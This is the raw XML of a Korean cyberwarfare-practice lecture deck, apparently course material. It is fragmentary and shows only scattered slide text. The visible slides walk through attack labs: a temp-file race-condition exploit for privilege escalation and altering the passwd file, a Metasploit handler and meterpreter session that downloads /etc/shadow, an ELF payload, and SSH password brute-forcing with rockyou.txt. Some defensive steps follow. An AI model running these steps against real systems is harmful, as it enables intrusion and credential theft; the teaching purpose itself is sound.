              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>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/sec/</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/sec/</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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0\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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t>/sec/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및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3276629171"/>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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Apache 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Directory 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과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Session</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Wireshark,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URL Redirect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 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2953544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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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dirty="0" err="1">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/sec/</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>getRoot.o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통해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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim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/sec/exploit.sh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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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/sec/exploit.sh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/sec/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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-s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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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echo "STOP... The passwd file has ben changed"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(context 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의해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Race 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   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/sec/</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createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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createTempFile</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createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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msfconsole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1354104123"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1356049" y="2481942"/>
          <a:ext cx="9479902" cy="2860937"/>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70761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2206188386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="709629">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709629">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709629">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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use exploit/multi/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exploit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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt;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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; download /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; exit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exit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dirty="0" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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–r packet.txt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-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux.elf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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/elf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dirty="0" err="1"/>
              <a:t>linux.elf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dirty="0" err="1"/>
              <a:t>linux.elf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–l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt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dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t># exit</a:t>
            </a:r>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알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호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iptables -A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dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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passwd test01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dirty="0"/>
              <a:t># iptables –A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 iftop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TCP Session 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ettercap</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4948</TotalTime>
  <Words>12258</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>3087</Paragraphs>
  <Slides>123</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123</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="130" baseType="lpstr">
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  PPT 구성</vt:lpstr>
      <vt:lpstr>/Intro  비대면 수업</vt:lpstr>
      <vt:lpstr>/Plan  강의안</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</vt:lpstr>
      <vt:lpstr>/Theory/T1   단위과제 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   시나리오 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   공격&amp;방어 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   체계 구성도</vt:lpstr>
      <vt:lpstr>/Theory/T2   리눅스 기본 명령어</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210</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-23T04:42:30Z</dcterms:modified>
</cp:coreProperties>
</file>